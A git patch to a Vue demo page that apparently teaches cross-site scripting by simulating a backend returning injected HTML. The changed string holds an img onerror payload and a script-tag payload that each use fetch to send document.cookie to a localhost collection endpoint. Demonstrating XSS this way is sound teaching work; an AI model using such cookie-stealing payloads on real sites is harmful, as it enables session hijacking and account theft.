From 8307c17785d8844fdbace8ba17f86bed4e5f2569 Mon Sep 17 00:00:00 2001
From: LCJ-MinYa <1049468118@qq.com>
Date: Fri, 14 Mar 2025 18:03:55 +0800
Subject: [PATCH] =?UTF-8?q?feat:=20xss=E6=A8=A1=E6=8B=9F=E7=9C=9F=E5=AE=9E?=
 =?UTF-8?q?=E8=A2=AB=E5=90=8E=E6=AE=B5=E6=B3=A8=E5=85=A5=E6=81=B6=E6=84=8F?=
 =?UTF-8?q?=E4=BB=A3=E7=A0=81=E8=BF=94=E5=9B=9E=E7=9A=84=E7=BB=93=E6=9E=9C?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 src/views/demo/xss.vue | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/views/demo/xss.vue b/src/views/demo/xss.vue
index 6ff3bac..e7ed5bd 100644
--- a/src/views/demo/xss.vue
+++ b/src/views/demo/xss.vue
@@ -17,7 +17,7 @@ export default {
     setup() {
         const cookie = encodeURIComponent(document.cookie);
         const message = ref(
-            `<p>我是一段携带恶意代码的测试html标签</p><img src="../xxx.jpg" onerror="console.log('img注入');fetch('http://localhost:3000/xss/test?cookie=${cookie}&userId=xxxx')">`
+            '<p>我是一段携带恶意代码的测试html标签</p><img src="../xxx.jpg" onerror="console.log(\'img注入\');fetch(\'http://localhost:3000/xss/test?cookie=encodeURIComponent(document.cookie)&userId=xxxx\')">'
         );
         // 这种方式的注入不会执行js代码，只是将数据显示在页面上
         message.value += `<script>console.log('script注入');fetch('http://localhost:3000/xss/test?cookie=${cookie}&userId=yyyy')<\/script>`;